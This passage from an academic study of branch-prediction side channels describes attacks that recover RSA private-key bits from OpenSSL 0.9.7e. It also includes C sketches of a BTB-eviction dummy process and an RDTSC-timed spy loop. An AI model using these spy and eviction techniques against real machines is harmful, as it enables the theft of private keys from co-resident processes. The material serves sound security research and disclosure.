For each bit of d, starting from $d_1$, the adversary performs two partitionings based on the assumptions $A^i_0$ and $A^i_1$, where $d_i$ is the next unknown bit that he wants to predict. He partitions the entire sample into two different sets. Under each assumption, every plaintext M in one of these sets yields the same result for $O_t(M, i)$. We call these partitionings the separations $S^i_0$ and $S^i_1$. Depending on the actual value of $d_i$, one of the assumptions $A^i_0$ and $A^i_1$ will be correct. We define the separation under the correct assumption as the "Correct Separation" and the other as the "Random Separation". To be more precise, we define the Correct Separation $CS^i$ as
$$CS^i = S^i_t = (CS^i_0, CS^i_1) = (\{M \mid O_t(M, i) = 0\}, \{M \mid O_t(M, i) = 1\}),$$
and the Random Separation $RS^i$ as
$$RS^i = S^i_{1-t} = (RS^i_0, RS^i_1) = (\{M \mid O_{1-t}(M, i) = 0\}, \{M \mid O_{1-t}(M, i) = 1\}),$$
where $d_i = t$. The decryption of each plaintext in $CS^i_1$ encounters a misprediction delay during the ith squaring, whereas none of the plaintexts in $CS^i_0$ results in a misprediction during the same computation. Therefore, the adversary will observe a significant timing difference between these two sets and he can predict the value of $d_i$. On the other hand, the occurrences of the mispredictions will be random-like for the sets $RS^i_0$ and $RS^i_1$, which is the reason why we call it a random separation. We can define a correct decision as taking the decision $d_i = t$ for which $O_t(M, i) = P(M^{(d_0, d_1, \ldots, d_i)_2} \bmod N)$ for each possible M. This attack requires knowledge of the BPU state just before the decryption, since this state, as well as the execution of the cipher, determines the prediction of the target branch. This information is not readily available to an adversary. However, he can perform the analysis phase assuming each possible state one at a time. One expects that only under the assumption of the correct state the above separations should yield a significant difference. Yet, a better approach is to set the BPU state manually. If the adversary has access to the machine the cipher is running on, he can execute a process to reset the BPU state or to set it to a desired state. Indeed, this is the strategy we follow in our other attacks. This type of attack can be applied on any platform as long as a deterministic branch prediction algorithm is used on it. To break a cipher using this kind of attack, we need to have a target branch whose outcome depends on the secret/private key of the cipher, a known nonconstant value like the plaintext or the ciphertext, and (possibly) some unknown values that can be searched exhaustively in a reasonable amount of time.

7.1.1.1. Examples of vulnerable systems. RSA with MM and without CRT (Chinese Remainder Theorem) is susceptible to this kind of attack. The conditional branch of the extra reduction step can be used as the target branch.
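To make the predicate P more concrete, the following self-contained C sketch (a hypothetical illustration, not the attacked OpenSSL code) implements a word-level Montgomery multiplication for a toy 64-bit odd modulus and reports whether the extra reduction step, i.e., the target branch, is executed while squaring a given message. Together with an assumed predictor state, this is exactly the information an adversary needs to simulate offline in order to sort messages into the sets M1, ..., M4; the modulus and the mapping to M1/M2 shown here are arbitrary choices for illustration.

```c
/* Sketch: simulating the extra-reduction branch of Montgomery multiplication
 * for a toy 64-bit modulus n (R = 2^64). */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

typedef unsigned __int128 u128;

/* -n^{-1} mod 2^64 by Newton iteration (n must be odd) */
static uint64_t neg_inv64(uint64_t n) {
    uint64_t x = n;                              /* n*n = 1 (mod 8), so x is correct to 3 bits */
    for (int i = 0; i < 5; i++) x *= 2 - n * x;  /* precision doubles each step */
    return (uint64_t)(0 - x);
}

/* Montgomery product a*b*R^{-1} mod n; *extra is set iff the final conditional
 * subtraction (the target branch of Attack 1) is executed. */
static uint64_t mont_mul(uint64_t a, uint64_t b, uint64_t n, uint64_t nprime, int *extra) {
    u128 t = (u128)a * b;
    uint64_t mfac = (uint64_t)t * nprime;
    u128 u = (t + (u128)mfac * n) >> 64;
    *extra = (u >= n);
    if (*extra) u -= n;
    return (uint64_t)u;
}

int main(void) {
    uint64_t n = 0x7fffffffffffffe7ULL;          /* arbitrary odd toy modulus, not a real RSA modulus */
    uint64_t nprime = neg_inv64(n);
    u128 r = ((u128)1 << 64) % n;                /* R mod n */
    uint64_t r2 = (uint64_t)((r * r) % n);       /* R^2 mod n */
    srand(1);
    for (int s = 0; s < 10; s++) {
        uint64_t m = (((uint64_t)rand() << 32) ^ (uint64_t)rand()) % n;
        int extra;
        uint64_t mbar = mont_mul(m, r2, n, nprime, &extra);  /* Montgomery representation of m */
        mont_mul(mbar, mbar, n, nprime, &extra);             /* the squaring under observation */
        printf("m = %016llx : extra reduction %s -> set M%c (under the assumption d_i = 1)\n",
               (unsigned long long)m, extra ? "taken" : "not taken", extra ? '1' : '2');
    }
    return 0;
}
```

In the real attack the adversary would first simulate the first i steps of the exponentiation (as described above) and then apply this predicate to the resulting intermediate value.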
We have already shown the attack on S&M exponentiation. It can also be adapted to b-ary and sliding windows exponentiation, c.f. [64] and Section 2.1.2. In these cases, the adversary needs to search each window value exhaustively and construct the partitions for each of these candidate window values. He encounters the correct separation only for the correct candidate and can therefore recover the correct values of the windows. If CRT is employed in the RSA implementation, we cannot apply this attack. The reason is that the outcome of the target branch will also depend on the values of p and q, which are not feasible to search exhaustively. Similarly, if the RSA implementation does not have a branch that is taken or not taken depending on a known nonconstant value (e.g., the extra reduction step in Montgomery Multiplication, which is performed only for certain inputs), we cannot use this approach to find the secret key. For example, choosing the if statement in S&M exponentiation (c.f. Line 4 in Fig. 2.1) as our target branch does not enable this attack. This is due to the fact that the mispredictions will occur in exactly the same steps of the exponentiation regardless of the input values, and one set in each of the two separations will always be empty.

7.1.2. Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack)

In this attack, we assume that the cipher runs on a simultaneous multithreading (SMT) machine, c.f. [92], and the adversary can run a dummy process simultaneously with the cipher process. In such a case, he can clear the BTB via the operations of the dummy process and cause a BTB miss during the execution of the target branch. The BPU automatically predicts the branch as not taken if it misses the target address in the BTB. Therefore, there will be a misprediction whenever the actual outcome of the target branch is 'taken'. We stress that the two parallel threads are isolated and share only the common BPU resource, c.f. [92, 91, 73, 80]. Borrowing the term from [73], we name this kind of attack an Asynchronous Attack, as the adversary-process needs no synchronization with the simultaneous crypto process. Here, an adversary also does not need to know any details of the prediction algorithm. He can simulate the exponentiations as done in the previous attack and can partition the sample based on the "actual" outcome of the branch. In other words, the following predicate in the oracle (c.f. Section 7.1.1) can be used:
$$P(m) = \begin{cases} 1 & \text{if the target branch is taken during the computation of } m^2 \bmod N \\ 0 & \text{otherwise.} \end{cases}$$
The adversary does not have to clear the entire BTB, but only the BTB set that stores the target address of the branch under consideration, i.e., the target branch. We define three different ways to achieve this (a small sketch of the first one follows below):

• Total Eviction Method: the adversary clears the entire BTB continuously.

• Partial Eviction Method: the adversary clears only a part of the BTB continuously. The BTB set that stores the target address of the target branch has to be in this part.

• Single Eviction Method: the adversary continuously clears only the single BTB set that stores the target address of the target branch.

The easiest method to apply is clearly the first one, because an adversary does not have to know the specific address of the target branch. Recall that the BTB set that stores the target address of a branch is determined by the actual logical address of that branch. The resolution of clearing the BTB plays a crucial role in the performance of the attack.
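The following C fragment is a minimal sketch of such a dummy total-eviction process, under the assumption that a few thousand distinct, always-taken conditional branches are enough to cycle through the BTB of the attacked CPU. It does not control at which addresses the branches are placed, so it cannot implement the partial or single eviction methods; a real implementation would lay out the branch instructions in assembly so that they hit specific BTB sets.

```c
/* Sketch of a "total eviction" dummy process (assumed to run on the sibling
 * SMT thread while the cipher process executes). Each expansion of BR is a
 * distinct, always-taken conditional branch at its own code address, so
 * executing the whole sequence repeatedly keeps replacing BTB entries. */
volatile int always = 1;   /* volatile so the compiler keeps every branch */
volatile int sink;

#define BR      if (always) sink++;
#define BR_16   BR BR BR BR BR BR BR BR BR BR BR BR BR BR BR BR
#define BR_256  BR_16 BR_16 BR_16 BR_16 BR_16 BR_16 BR_16 BR_16 \
                BR_16 BR_16 BR_16 BR_16 BR_16 BR_16 BR_16 BR_16
#define BR_4096 BR_256 BR_256 BR_256 BR_256 BR_256 BR_256 BR_256 BR_256 \
                BR_256 BR_256 BR_256 BR_256 BR_256 BR_256 BR_256 BR_256

int main(void) {
    for (;;) {
        BR_4096   /* touch at least as many branch sites as the BTB has entries */
    }
    return 0;
}
```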
We have assumed so far that it is possible to clear the entire BTB between two consecutive squaring operations of an exponentiation. However, in practice this is not (always) the case. Clearing the entire BTB may take more time than it takes to perform the operations between two consecutive squarings. Although this does not nullify the attack, it will (most likely) mandate a larger sample size. Therefore, if an adversary can apply one of the last two eviction methods, he can improve the performance of the attack. We want to mention that, from the cryptographic point of view, we can assume that an adversary knows the actual address of any branch in the implementation due to Kerckhoffs' Principle. Under this assumption, the adversary can apply the single eviction method and achieve a very high resolution, which enables him to cause a BTB miss each time the target branch is executed. Recall also that no complicated synchronization between the crypto and the adversary process is needed.

7.1.2.1. Examples of vulnerable systems. The same systems vulnerable to the first attack (c.f. Section 7.1.1) are also vulnerable to this kind of attack. The main difference of this attack compared to the first one is the ease of applying it, i.e., there is no need to know or reverse-engineer the subtle BPU details in order to derive the correct BPU states at specific points in time.

7.1.3. Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack)

In the previous attack, we specifically excluded the synchronization issue. However, if the adversary finds a way to establish synchronization with the cipher process, i.e., he can determine when, e.g., the ith step of the exponentiation takes place and can clear the BTB just before this step, then he can introduce misprediction delays at certain points during the computation. Borrowing the term again from [73], we name this kind of attack a Synchronous Attack, as the adversary-process needs some kind of synchronization with the simultaneous crypto process. Assume that the RSA implementation employs S&M exponentiation and the if statement in S&M exponentiation (c.f. Line 4 in Figure 2.1) is used as the target branch. As stated above, the previous attacks cannot break this system if only the mentioned conditional branch is examined. However, if the adversary can clear the BTB set of the target branch (c.f. Single Eviction Method in Section 7.1.2) just before the ith step, he can directly determine the value of $d_i$ in the following way. The adversary runs RSA for a known plaintext and measures the execution time. Then he runs it again for the same input, but this time he clears the single BTB set during the decryption just before the ith execution of the conditional branch under examination, i.e., the if statement of Line 4 in Fig. 2.1. This conditional branch is taken or not taken depending only on the value of $d_i$. If it turns out to be taken, the second decryption will take longer than the first execution because of the misprediction delay. Therefore, the adversary can easily determine the value of this bit by successively analyzing the execution times.

7.1.3.1. Examples of vulnerable systems. Any implementation of a cryptosystem is vulnerable to this kind of attack if the execution flow is "key-dependent". The exponents of RSA with S&M exponentiation can be directly obtained even if the CRT is used. If RSA employs sliding window exponentiation, then we can find a significant number of bits (but not all) of the exponents.
However, if the b-ary method is employed, then only $1/2^{wsize}$ of the exponent bits can be discovered, where wsize is the size of the window. This attack can even break such prominent and efficient implementations that had been considered to be immune to certain kinds of side-channel attacks, c.f. [52, 105].

7.1.4. Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)

In the previous three attacks, we have considered analyzing the execution time of the cipher. In this attack, we will follow a different approach. Again, assume that an adversary can run a spy process simultaneously with the cipher. This spy process continuously executes branches and all of these branches map to the same BTB set as the conditional branch under attack. In other words, there is a conditional branch (under attack) in the cipher, which processes the exponent and executes the corresponding sequence of operations. Moreover, assume also that the branches in the spy process and the cipher process can only be stored in the same BTB set. Recall that it is easy to understand the properties of the BTB using simple benchmarks as explained in [65]. The adversary starts the spy process before the cipher, so when the cipher starts decryption/signing, the CPU cannot find the target address of the target branch in the BTB and the prediction must be not-taken, c.f. [92]. If the branch turns out to be taken, then a misprediction will occur and the target address of the branch needs to be stored in the BTB. Then, one of the spy branches has to be evicted from the BTB so that the new target address can be stored. When the spy-process re-executes its branches, it will encounter a misprediction on the branch that has just been evicted. If the spy-process also measures the execution time of its branches (altogether), then it can detect whenever the cipher modifies the BTB, because the execution of these spy branches takes a little longer than usual. Thus, the adversary can simply determine the complete execution flow of the cipher process by continuously performing the same operations, i.e., just executing spy branches and measuring the execution time. He will see the prediction/misprediction trace of the target branch, and so he can determine the execution flow. We name this kind of attack an Asynchronous Attack, as the adversary-process needs no synchronization at all with the simultaneous crypto process — it just follows the paradigm: continuously execute spy branches and measure their execution time.

7.1.4.1. Examples of vulnerable systems. Any implementation that is vulnerable to the previous attack is also vulnerable to this one. Specifically, any implementation of a cryptosystem is vulnerable to this kind of attack if the execution flow is "key-dependent". This attack, on the other hand, is very easy to apply, because the adversary does not have to solve the synchronization problem at all. Considering all these aspects of the current attack, we can confidently say that it is a powerful and practical attack, which puts many of the current public-key implementations in danger.

7.2. Practical Results

We also performed practical experiments to validate the aforementioned attacks, which exploit the branch predictor behavior of modern microprocessors. Obviously, eviction-driven attacks using simultaneous multithreading are more general and demand nearly no knowledge about the underlying BPU, compared to the other type of branch prediction attacks from above.
Thus, we have chosen to carry out our experimental attacks in a popular simultaneous multithreading environment, c.f. [91]. In this setting, an adversary can apply this kind of attack without any knowledge of the details of the used branch prediction algorithm and BTB structure. Therefore we decided to implement our two asynchronous attacks and show their results as a "proof-of-concept".

7.2.1. Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack)

For this kind of attack we have chosen, for reasons of simplicity and practical significance, to implement the single and total eviction methods. We used a dummy process that continuously evicts BTB entries by executing branches. This process was running simultaneously with RSA on an SMT platform. It executed a large number of branches and evicted each single BTB entry one at a time. This method requires almost no information on the BTB structure. We performed this attack on a very simple RSA implementation that employed square-and-multiply exponentiation and Montgomery multiplication with dummy reduction. We used the RSA implementation in OpenSSL version 0.9.7e as a template and made some modifications to convert this implementation into the simple one stated above. To be more precise, we changed the window size from 5 to 1, turned blinding off, removed the CRT mode, and added the dummy reduction step. The experiments were run under the configuration shown in Table 7.1. We used random plaintexts generated by the rand() and srand() functions available in the standard C library. The current time was fed into the srand() function as the pseudorandom number generation seed. We measured the execution time in terms of clock cycles using the cycle counter instruction RDTSC, which is available at user level.

  Operating System:       RedHat workstation 3
  Compiler:               gcc version 3.2.3
  Cryptographic Library:  OpenSSL 0.9.7e

TABLE 7.1. The configuration used in the experiments

We generated 10 million random single-block messages and measured their decryption times under a fixed, randomly generated 512-bit key. In our analysis phase, we eliminated the outliers and used only 9 million of these measurements. We then processed each of these plaintexts and divided them into the sets explained in Section 7.1.1 and Section 7.1.2, based on the assumption on the next unknown bit and the assumed outcome of the target branch. Thereafter we calculated the difference of the average execution times of the corresponding sets for each bit of the key except the first two bits. The mean and the standard deviation of these differences for the correct and random separations of the total eviction method are given in Figure 7.1. This figure also shows, on the right side, the raw timing differences after averaging the 9 million measurements into one single timing difference, where a single dot corresponds to the timing difference of a specific exponent bit, i.e., the x-axis corresponds to the exponent bits from 2 to 511. Using the values in Figure 7.1, we can calculate the probability of successful prediction of any single key bit. We interpret the measured average execution time differences for the correct and random separations as realizations of normally (Gaussian) distributed random variables, denoted by Y and X respectively. We may assume $Y \sim N(\mu_Y, \sigma_Y^2)$ and $X \sim N(\mu_X, \sigma_X^2)$ for each bit of any possible key.

FIGURE 7.1. Practical results when using the total eviction method in attack principle 2.
Here $\mu_Y = 58.91$, $\mu_X = 1.24$, $\sigma_Y = 62.58$, and $\sigma_X = 34.78$, c.f. Figure 7.1. We then introduce the normally distributed random variable Z as the difference between realizations of Y and X, i.e., $Z = Y - X$ and $Z \sim N(\mu_Z, \sigma_Z^2)$. The mean and deviation of Z can be calculated from those of X and Y as
$$\mu_Z = \mu_Y - \mu_X = 58.91 - 1.24 = 57.67$$
$$\sigma_Z = \sqrt{\sigma_Y^2 + \sigma_X^2} = \sqrt{(62.58)^2 + (34.78)^2} = 71.60 .$$
As our decision strategy is to pick the assumption on the bit value that yields the highest execution time difference between the sets we constructed under that assumption, our decision will be correct whenever $Z > 0$. The probability of this event, $\Pr[Z > 0]$, can be determined by using the z-distribution table, i.e.,
$$\Pr[Z > 0] = 1 - \Phi((0 - \mu_Z)/\sigma_Z) = \Phi(0.805) \approx 0.79 ,$$
which shows that our decisions will be correct with probability 0.79 if we use N = 10 million samples. Although we could increase this accuracy by increasing the sample size, this is not necessary. If we make a wrong decision for a bit, both of the separations will be random-like afterwards and we will only encounter relatively insignificant differences between the separations. Therefore, it is possible to detect an error and recover from a wrong decision without necessarily increasing the sample size. Similarly, Figure 7.2 shows the single eviction method results. Since the resolution is much higher in the single eviction method, as an expected consequence, it is much more efficient than the total eviction method. A calculation similar to the one above points to a success rate of 89%.

FIGURE 7.2. Practical results when using the single eviction method in attack principle 2.

7.2.2. Results for Attack 4 = Trace-driven Attack against the BTB (Asynchronous Attack)

To practically test attack 4, which is also an asynchronous attack, we used an experimental setup very similar to the one described above. But instead of a dummy process that blindly evicts the BTB entries, we used a real spy function. The spy-process evicted the BTB entries by executing branches just like the dummy process. Additionally, it also measured the execution time of these branches. More precisely, it only evicted the entries in the BTB set that contains the target address of the RSA branch under attack and reported the timing measurements. In this experiment, we examined the execution of the conditional branch in the exponentiation routine and not the extra reduction steps of Montgomery Multiplication. We implemented the spy function in such a way that it only checks the BTB at the beginning or early stages of each Montgomery multiplication. Thus, we get exactly one timing measurement per Montgomery operation, i.e., multiplication or squaring. Therefore, we could achieve a relatively "clean" measurement procedure. We ran our spy and the cipher process N times, where N is the sample size. Then we averaged the timing results taken from our spy to decrease the noise amplitude in the measurements. The resulting graph shown in Figure 7.3 presents our first results for different values of N — clearly visualizing the difference between squaring and multiplication.

FIGURE 7.3. Increasing gap between multiplication and squaring steps due to missing BTB entries.

As said above, one can deduce very clearly from Figure 7.3 that there is a stabilizing, significant cycle difference between multiplication and squaring steps during the exponentiation.
Now that we have verified this BPU-related gap between the successive multiplication and squaring steps during the exponentiation, we want to show how simple it is to retrieve the secret key with attack principle 4. To do this, we simply zoom into Figure 7.4 with N = 10000 measurements. This yields the picture on the bottom of Figure 7.4, showing the 89th to 104th Montgomery operations for N = 10000 measurements. Once such a sequence of multiplications and squarings is captured, it is a trivial task to translate this sequence into the actual values of the key bits. We would like to remark that the sample size of 10000 measurements might appear quite high at first sight. But using some more sophisticated tricks (which are out of the scope of the present chapter) we could obtain a meaningful square/multiply cycle gap using only a few measurements.

7.3. Conclusions and recommendations for further research

Along the theme of the recent research efforts to explore software side-channel attacks against commodity PC platforms, we have identified the branch prediction capability of modern microprocessors as a new security risk which has not been known so far. Using RSA, the most popular public encryption/signature scheme, and its most popular open source implementation, OpenSSL, we have shown that there are various attack scenarios in which an attacker could exploit a CPU's branch prediction unit. Also, we have successfully implemented a very powerful attack (Attack 4, the Trace-driven Attack against the BTB, which even has the power to break prominent side-channel security mechanisms like those proposed by [52, 105]). The practical results from our experiments should encourage thinking about efficient and secure software mitigations for this kind of new side-channel attack. As an interesting countermeasure, the branchless exponentiation method known as "atomicity" from [26] comes to our mind. Another interesting research vector might be the idea to apply Branch Prediction Attacks to symmetric ciphers. Although this seems at first sight a bit odd, we would like to point out that an early study [44] also applied the Timing Attack scenario of Kocher [59] to certain DES implementations and identified branches in the respective DES implementations as a potential source of information leakage. Paired with our improved understanding of branches and their potential leakage of secrets, it might be a valid idea to try Branch Prediction Attacks along the ideas of [44]. Similar to other very recent software side-channel attacks against RSA and AES, c.f. [80, 67, 73, 5], our practically simplest attacks rely on a CPU's Simultaneous Multi-Threading (SMT) capability, c.f. [91]. While SMT seems at first sight a necessary requirement of our asynchronous attacks, we strongly believe that this is just a matter of clever and deeper systems programming capabilities and that this requirement could be removed along some ideas as mentioned in [48, 73]. Thus, we think it is of highest importance to repeat our asynchronous branch prediction attacks also on non-SMT capable CPUs.

FIGURE 7.4. Connecting the spy-induced BTB misses and the square/multiply cycle gap.

8. ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS

Deep CPU pipelines, paired with the CPU's ability to fetch and issue multiple instructions at every machine cycle, led to the concept of superscalar processors.
Superscalar processors admit a theoretical or best-case performance of less than 1 machine cycle per completed instruction, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch predictors in order to circumvent those performance bottlenecks. Thus, it is not surprising that there has been vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately, we identify branch prediction as a novel and unforeseen side-channel, and thus another new security threat within the computer security field, c.f. Chapter 7. We only recently discovered that the branch prediction capability, common to all modern high-end CPUs, is another new side-channel posing a novel and unforeseen security risk. In [1, 7] and Chapter 7, we present different branch prediction attacks on simple RSA implementations as a case study to describe the basics of the novel attacks an adversary can use to compromise the security of a platform. In order to do so, we gradually develop, starting from an obvious attack principle, more and more sophisticated attack principles, resulting in four different scenarios. To demonstrate the applicability of these attacks, we complement these scenarios by showing the results of selected practical implementations of various attack scenarios, c.f. Section 7.2. Irrespective of our achievements, it is obvious that all of these attacks still have the flavor of a classical timing attack against RSA. Indeed, careful examination of these four attacks shows that they all require many measurements to finally reveal the secret key. In a timing attack, the key is obtained by taking many execution time measurements under the same key in order to statistically amplify some small but key-dependent timing differences, c.f. [59, 34, 85]. Thus, by simply eliminating the deterministic time-dependency of the RSA signing process on the underlying key through very well understood and computationally cheap methods like message blinding or secret exponent masking, c.f. [59], such statistical attacks are easy to mitigate. Therefore, it is quite natural to assume that such timing attacks pose no real threat to the security of PC platforms. Unfortunately, our results presented in this chapter teach us that this "let's think positive and relax" assumption is quite wrong! Namely, we dramatically improve upon the former result of [7] in the following sense. We prove that a carefully written spy-process running simultaneously with an RSA-process is able to collect almost all of the secret key bits during one single RSA signing execution. We call such an attack, analyzing the CPU's Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack. In order to clearly differentiate it from those branch prediction attacks that rely on statistical methods and require many computation measurements under the same key, we call the latter Differential Branch Prediction Analysis (DBPA) attacks. However, in addition to that very crucial security implication — SBPA is able to break even such implementations which are assumed to be at least statistically secure — our successful SBPA attack also bears another equally critical security implication.
Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks, c.f. [52]. Unfortunately, this is not true, as even such "balanced branch" implementations can be completely broken by our SBPA attacks.

8.1. Multi-Threading, spy and crypto processes

With the advent of the papers [73, 80], a new and very interesting attack paradigm was initiated. It relies on the massive multi-threading (quasi-parallel) capabilities of modern CPUs, whether hardware-managed or OS-managed, c.f. [67]. While purely single-threaded processors run threads/processes serially, the OS manages to execute several programs in a quasi-parallel way, c.f. [93]. The OS basically decomposes an application into a series of short threads that are interleaved with other application threads. On the other side, there are also certain processors, so called hardware-assisted multi-threaded CPUs, which enable a much finer-grained quasi-parallel execution of threads, c.f. [92, 91]. Here, some "cheap" CPU resources are explicitly doubled (tripled, etc.), while some others are temporarily shared. This allows two or more processes to run quasi-parallel on the same processor, as if there were two or more logical processors [92, 93]. This indeed allows fine-grained instruction-level multi-threading, c.f. [92]. Irrespective of whether the CPU is single-threaded or hardware-assisted multi-threaded, some logical elements are always shared, which enables one process to spy on another process, as the shared CPU elements leak some so called metadata, c.f. [73]. Of course, the sharing of the resources does not allow a direct reading of the other application's data, as the memory protection unit (MMU or Virtual Machine) strictly enforces application memory separation. One such shared element, which is the central point of interest for this chapter, is the highly complex BPU of modern CPUs. The new paradigm put forward by [73, 80], although already implicitly pointed out by Hu [48], consists of quasi-parallel processes, called the spy process and the crypto process. As the name suggests, the spy process tries to infer some secret data from the crypto process executed in parallel by observing the leaked metadata. In the most extreme and most practical scenario, both processes run completely independently of each other, and this scenario was termed an asynchronous attack by [73]. Given the very complex process structures and their handling by a modern OS, c.f. [93], the following heuristic is quite obvious. A hardware-assisted multi-threading CPU will simplify a successful spy process, as:

1. Some inevitable "noise" due to the respective thread switches will be absorbed by the CPU's hardware assistance.

2. The instruction-level threading capability enhances the time-resolution of the spy-process.

In the other case, one needs very sophisticated OS expertise and deep thread scheduling expertise, c.f. [67]. As the above paradigm and all its subtle implementation details heavily depend on the underlying OS, CPU type and frequency, etc., we will not go further into those technical details here, and just assume the existence of a suited spy process and a corresponding crypto process in a hardware-assisted multi-threading environment.

8.2. Improving Trace-driven Attacks against the BTB

In this section, we present our improvement over the DBPA attack from [7], which we outlined in the previous chapter.
However, in order to logically derive our final successful SBPA result against some version of the binary square and multiply exponentiation for RSA, we have to investigate the situation a bit deeper. If we consider Figure 7.4, we can certainly draw the conclusion that from spy processes like this, there is no hope for a successful SBPA. At first sight, this looks quite astonishing for the following reason. In a certain sense, the trace-driven attack against the BTB from [7] is similar to the cache eviction attacks of [80, 73, 67]. In these attacks, a spy process is also continuously testing through timing measurements which of its private data had been evicted by the crypto process. And especially in the RSA OpenSSL 0.9.7 case from [80], the measurement quality was high enough to get lots of secret key bits by spying on one single exponentiation, i.e., inferring by simple time measurements which data the crypto process had loaded into the data cache to perform the RSA signing operation. However, there is one fundamental difference setting BPA attacks apart from pure data cache eviction attacks. Attacking the BTB, although it is itself acting like a simple cache, actually targets the instruction flow, which is magnitudes more complicated than the data flow within the memory hierarchy, i.e., between the L1 data cache and the main memory. Numerous architectural enhancements take care that a deeply pipelined superscalar CPU like the Pentium 4 cannot be stalled too easily by a BTB miss. When considering just the (publicly known) Front-End Instruction Pipeline Stages between the Instruction Prefetching Unit and the resulting feeding into the so called µop Queue, as shown in Figure 8.1 below, we recognize that this Front-End Instruction path alone is much more complicated than the data flow path, c.f. [91].

FIGURE 8.1. Front-End Instruction Pipeline Stages feeding the µop Queue.

If we inspect Figure 8.1 in more depth, we can recognize that the Pentium 4 has two different BTBs: a Front-End BTB and a Trace-Cache BTB. As the architectural reasons for this second Trace-Cache BTB are not of interest for this chapter, we refer the interested readers to the literature on modern processor design and trace caches, c.f. [91]. However, more interesting is the information on their sizes, and especially their joint functionality, which we can partially learn from [91, pp. 913-914]: "The travels of a conditional branch instruction." The Front-End BTB has a size of 4096 entries, whereas the Trace-Cache BTB has only a size of 512 entries, i.e., the Front-End BTB is a superset of the Trace-Cache BTB. The most interesting fact that we can draw from this doubled BTB is the following. Executing a certain sequence of branches in the spy process which evicts just the Front-End BTB might not necessarily suffice to completely enforce that the CPU does not find the target address of the target branch in any of the BTBs, so that the prediction must be not-taken. A certain hidden interaction between the Front-End BTB and the Trace-Cache BTB might allow for some "short-term" victim address evictions, but still store the target branch in one of the BTBs. Thus, we let the spy process continuously do the following: execute a certain fixed sequence of, say, t branches to evict the target branch's entry out of the BTB and measure the overall execution time of all these branches.
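A minimal sketch of one such spy step is given below, assuming gcc on an x86 machine; it only illustrates the measure-while-evicting loop. In a real spy process the t branch instructions are laid out (typically in assembly) so that they all map to the BTB set of the target branch, and the steps are paced so that one measurement falls into each Montgomery operation, both of which this fragment omits.

```c
/* Sketch: repeatedly execute a fixed sequence of t always-taken branches and
 * time it with RDTSC. A spike in the measured time indicates that the cipher
 * process has just (re)installed its branch target, evicting one of ours. */
#include <stdio.h>
#include <stdint.h>

static inline uint64_t rdtsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}

volatile int always = 1;
volatile int sink;

#define BR     if (always) sink++;
#define BR_8   BR BR BR BR BR BR BR BR
#define BR_32  BR_8 BR_8 BR_8 BR_8   /* t = 32, deliberately larger than the BTB associativity */

#define N_STEPS 100000               /* number of spy steps to record */

int main(void) {
    static uint64_t trace[N_STEPS];
    for (long i = 0; i < N_STEPS; i++) {
        uint64_t t0 = rdtsc();
        BR_32                         /* evict the target branch and re-execute our own branches */
        trace[i] = rdtsc() - t0;
    }
    for (long i = 0; i < N_STEPS; i++)
        printf("%ld %llu\n", i, (unsigned long long)trace[i]);
    return 0;
}
```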
This is exactly what is done in our earlier attack except for a single difference, which transforms our trace-driven attack from a DBPA attack into an extremely powerful SBPA attack. The optimal value of t turns out to be significantly larger than the exact associativity of the BTB, which is the value used in our previous attack, c.f. [7] and Chapter 7. The increased value of t guarantees the eviction of the target entry from all of the different places that can store it, e.g., from both the Front-End BTB and the Trace-Cache BTB. The value of t also affects the cycle gap between squaring and multiplication in the following way. As mentioned in the previous section, when the target branch is evicted from the BTB and the branch turns out to be taken, then a misprediction will occur and the target address of the branch needs to be stored in the BTB. Then, one of the spy branches has to be evicted from the BTB so that the new target address can be stored. When the spy-process re-executes its branches, it will encounter a misprediction on the branch that has just been evicted. A fact that is not mentioned above is that this misprediction will also trigger further mispredictions, since the entry of the evicted spy branch needs to be re-stored and another not-yet-reexecuted spy branch entry has to be evicted, which will in turn cause other mispredictions. In the end, the execution time of this spy step is expected to suffer from many misprediction delays, resulting in a large gap between squaring and multiplication. However, this scenario only works out if the entries are completely evicted from all possible locations. As can be seen in Figure 7.4, the gap is only 20 cycles in the previous attack, which indicates that the above scenario is not valid for that particular attack, or more precisely, for that value of t. Increasing t to its optimal value enforces our scenario and guarantees a very large gap composed of several misprediction delays. This fact is clear considering the gap of around 1000 cycles in our SBPA attack, i.e., the improved trace-driven attack. The optimal value of t is eventually machine dependent and (most likely) also depends on the particular set of software, i.e., the OS, running on the machine. Therefore, an adversary needs to tune the spy process on the attack machine, e.g., empirically determine the optimal value of t.

8.3. Practical Results

To validate our aforementioned enhanced "BTB eviction strategy", we performed some practical experiments. As usual in this context, we have chosen to carry out our experimental attacks in a popular simultaneous multithreading environment, c.f. [91], as this CPU type simplifies the context switching between the spy and the crypto process. In our above outlined setting, the adversary can apply this asynchronous attack without any knowledge of the details of the used branch prediction algorithm or any deeper knowledge of the BTB structure. As in our previous Branch Prediction attacks, we performed this attack on a very simple RSA implementation that employed square-and-multiply exponentiation and Montgomery multiplication with dummy reduction. We used the RSA implementation from OpenSSL version 0.9.7e as a template and made some modifications to convert this implementation into the simple one stated above. To be more precise, we changed the window size from 5 to 1, removed the CRT mode, and added the dummy reduction step.
We used random plaintexts generated by the rand() and srand() functions available in the standard C library, and measured the execution time in terms of clock cycles using the cycle counter instruction RDTSC, which is available at user level. The experimental results of this enhanced "BTB eviction strategy" for RSA-sign with a 512-bit key length are shown in Figure 8.2. As recognizable from Figure 8.2, our repeated spy-execution of a certain fixed sequence of branches certainly enhanced the resolution for one single RSA-sign measurement. Indeed, comparing Figure 8.2 with Figure 7.4, we can say that this simple trick "saved" an averaging over about 1000 to 10000 different measurements. However, although the results shown in Figure 8.2 weaken the strength of the key tremendously, they do not give us enough information to break the RSA key easily.

FIGURE 8.2. Results of SBPA with an improved resolution.

